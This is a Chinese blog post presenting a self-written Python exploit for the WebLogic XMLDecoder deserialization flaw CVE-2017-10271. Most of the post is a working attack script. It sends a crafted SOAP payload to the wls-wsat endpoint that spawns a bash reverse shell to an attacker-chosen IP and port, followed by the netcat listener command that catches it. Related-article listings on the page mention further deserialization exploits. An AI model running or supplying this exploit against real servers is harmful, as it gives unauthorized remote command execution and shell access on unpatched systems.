weblogic-xml反序列化脚本

最新推荐文章于 2023-05-28 23:21:03 发布
最新推荐文章于 2023-05-28 23:21:03 发布
阅读量153 收藏
点赞数
分类专栏: 脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48776804/article/details/117839950
版权

weblogic-xml反序列化脚本

  • CVE-2017-10271
  • 自己手写的第一个脚本,发送的请求和回复包都是有框架的,注意书写格式,注意大小写,脚本好写,不好改

1 脚本

## xml decoder
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author xiaobai

import requests
import sys
import json

def title():
	print('xiaobai zhizuo')

def POC_1(target_url, IP, PORT):
	vuln_url = target_url + "/wls-wsat/CoordinatorPortType"
	headers = {
		"Content-Type": "text/xml",
		"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
	}
	data = """
		<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
		<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
		<java version="1.4.0" class="java.beans.XMLDecoder">
		<void class="java.lang.ProcessBuilder">
		<array class="java.lang.String" length="3">
		<void index="0">
		<string>/bin/bash</string>
		</void>
		<void index="1">
		<string>-c</string>
		</void>
		<void index="2">
		<string>bash -i &gt;&amp; /dev/tcp/%s/%s 0&gt;&amp;1</string>
		</void>
		</array>
		<void method="start"/></void>
		</java>
		</work:WorkContext>
		</soapenv:Header>
		<soapenv:Body/>
		</soapenv:Envelope>
	""" % (IP,PORT)
	try:
		response = requests.request("POST", url=vuln_url, headers=headers, data=data)
	except:
		print("漏洞利用失败哦")

if __name__ == '__main__':
	title()
	target_url = str(input("please inout Attack url----"))
	IP = str(input("请输入监听ip---"))
	PORT = str(input("请输入监听端口---"))
	POC_1(target_url, IP, PORT)

2 执行

python3 payload.py
nc -lvnp
在这里插入图片描述

在这里插入图片描述

参考链接

  • https://mp.weixin.qq.com/s/LtvKiz8gO-tjjkqHspcvfA
    requests库的使用
    在这里插入图片描述
wx_7782175678
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
weblogic反序列化漏洞测试工具python脚本
05-22
README.md中有具体使用方法,python脚本测试weblogic反序列化漏洞,测试前需要关闭T3协议
shiro反序列化脚本.zip
07-28
需要用到的俩个文件 ysoserial-master.jar 和 poc.py
反序列化——php反序列化
qq_48829044的博客
06-20 373
php反序列化
Java反序列化生成Payload附利用脚本
02-12
Java反序列化生成Payload附利用脚本,帮助运维测试weblogic及jboss等中间件的漏洞。
CTF——php反序列化
m0_46317063的博客
11-26 339
记一次CTF解题
weblogic 反序列化漏洞补丁
07-05
CVE-2018-2628是WebLogic服务器中发现的一个严重反序列化漏洞,可能导致远程代码执行(RCE)风险,威胁到服务器的安全性。 该漏洞的根本原因在于WebLogic服务器在处理某些类型的请求时,未能正确验证反序列化的数据...
weblogic漏洞补丁
07-03
这种类型的文件常用于自动化的补丁管理系统,帮助识别和应用正确的补丁序列。 为了确保WebLogic Server的安全,管理员应遵循以下步骤: 1. **下载并验证补丁**:从Oracle官方网站获取补丁,并使用提供的校验和工具...
WebLogic Clusters Session_v1.doc
05-24
为了支持in-memory session复制,所有servlet和jsp的会话数据必须实现`java.io.Serializable`接口,以允许对象被序列化和反序列化。此外,开发者需要注意以下几点: - **SESSION必须序列化**:所有存储在session...
java源码包---java 源码 大量 实例
04-18
 Java生成密钥、保存密钥的实例源码,通过本源码可以了解到Java如何产生单钥加密的密钥(myKey)、产生双钥的密钥对(keyPair)、如何保存公钥的字节数组、保存私钥到文件privateKey.dat、如何用Java对象序列化保存私钥...
WTC的EJB项目TOLOWER
11-16
这通常涉及XML或者自定义协议的解析和序列化。 在"WTCEJB"这个压缩包文件中,可能包含了以下内容: 1. EJB组件代码:这些Java类实现了EJB接口,处理来自Tuxedo的请求,执行业务逻辑,并返回结果。 2. Tuxedo客户端...
中职网络安全2023C模块反序列化靶机+批量脚本及其思路
Aa0ker的博客
03-14 563
weblogic反序列化_如何让weblogic反序列化无迹可寻
weixin_39747511的博客
12-12 221
一背景2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814)。攻击者利用该漏洞,可在未授权的情况下远程执行命令。目前,官方补丁尚未发布,漏洞细节未公开。二漏洞情况分析WebLogicServer是美国甲骨文(Oracle)公司开发的一...
反序列化总结
最新发布
2202_75361164的博客
05-28 236
使用php://filter/resource=f14g.php和php://filter/read=convert.base64-encode/resource=f14g.php都行,这里没有拦截可以不用base64编码绕过。2、存在三个变量,需要使用的变量$a无论绕过都得被题目改值,但是改值完毕后其他两个变量进行了赋值(如:$b=$c,$c没有被改值),这时将语句写个$c,$a为$b的引用,从而实现语句经过$c给$a。s:3:"111";}变为O:4:"xctf":2:{s:4:"flag";
修复weblogic的JAVA反序列化漏洞的多种方法--预防GetShell攻击
既是过河之卒,惟有奋力向前。
06-15 1422
0x00 前言 目前oracle还没有在公开途径发布weblogic的JAVA反序列化漏洞的官方补丁,目前看到的修复方法无非两条: 使用SerialKiller替换进行序列化操作的ObjectInputStream类; 在不影响业务的情况下,临时删除掉项目里的 “org/apache/commons/collections/functors/InvokerTransformer.cl...
weblogic之T3反序列化
weixin_45682070的博客
03-02 1995
T3协议 什么是T3协议? 解释摘抄自此文 Weblogic的RMI规范的实现使用一个专有协议T3。 您可以将T3(和安全T3S)视为坐在http之上的一个图层,以公开/允许客户端的JNDI调用。 通常,T3协议用于与WebLogic控制台进行交互。 T3是用于在WebLogic服务器和其他types的Java程序之间传输信息的协议。 WebLogic会跟踪连接到应用程序的每个Java虚拟机。 为了将stream量传送到Java虚拟机,WebLogic创build一个T3连接。 这种types的连接通过消除
java反序列化劫持脚本_Java反序列化漏洞自动挖掘方法
weixin_28327051的博客
02-28 229
你说什么最难受,是相爱的人见不了面,还是最爱的人在别人身边。。。---- 网易云热评文章来源:蚂蚁非攻安全实验室 、先知白帽大会一、序列化与反序列化1、定义:序列化是用于将对象转换成二进制串存储,对应着 writeObject,反序列正好相反,将二进制串转换成对象,对应着 Freadobject 2、各编程语言都存在:Java:java.io.Serializable接口、fastjson、ja...
关于反序列化漏洞的一些理解
才不是小弱鸡的博客
09-16 9493
  php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __construct, __destruct, __toString, __sleep, __wakeup等等。这些函数在某些情况下会自动调用,比如__construct当一个对象创建时被调用,__destruct当一个对象销毁时被调用,__toString当一个对象被当作一个字符串使用。为了更好的...
shiro反序列化漏洞(简单,详细,附脚本)
刘孟棋的博客
07-28 984
第一步:下载脚本 正在审核明天补充 第二步:Shell工具打开三个窗口备用 第三步 第一个窗口执行命令 运行如下脚本然后就不要动这个窗口了,等待最后发生奇迹 nc -lvvp 8088 第四步 获取Bash重新编码的脚本 将IP替换成你当前服务器的IP 再将这段代码在下边的网址中重新编码,(注:这个IP换成当前服务器的IP不是要被攻击的那台服务器的IP,8088这个端口和第三步执行nc -lvvp 8088 的端口对应的是一个端口,可以不是8088但是这俩个要一样) bash -i >&
反序列化工具
json_li的博客
10-11 1813
模仿1024tools.com/unserialize写的反序列化小工具 用了两个文件完成的 话不多说,上源码 js、css文件下载地址 1.serialize.php <?php /** * 序列化 反序列化处理 */ header('content-type:text/html;charset=utf8 '); require_once 'function.php'
weblogic反序列化原理
05-14
WebLogic反序列化漏洞是指WebLogic服务器在处理Java对象反序列化时存在漏洞,攻击者可以通过构造恶意的序列化数据来执行远程代码。其原理主要包括以下几点: 1. Java对象序列化:Java对象序列化是将Java对象转换为字节流的过程。Java对象可以通过序列化变为字节流,然后通过网络传输或保存到磁盘上。Java对象可以包含变量、方法和类信息等内容。 2. 反序列化反序列化是将字节流转换为Java对象的过程。当一个对象被序列化之后,它的所有信息都会被保存到一个字节流中。可以通过反序列化来读取这个字节流,并将其转换为一个Java对象。 3. 恶意序列化数据:攻击者可以通过构造恶意的序列化数据来执行远程代码。攻击者可以将恶意代码序列化到字节流中,并将其发送给WebLogic服务器。当WebLogic服务器反序列化这个字节流时,就会执行其中的恶意代码,从而实现远程代码执行。 4. 漏洞利用:攻击者可以利用WebLogic反序列化漏洞来执行远程代码,例如执行系统命令、窃取敏感数据等。攻击者可以通过构造恶意的序列化数据来触发漏洞,并执行恶意代码。 总的来说,WebLogic反序列化漏洞是一种Java反序列化漏洞,攻击者可以利用该漏洞来执行远程代码,从而实现攻击目标。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值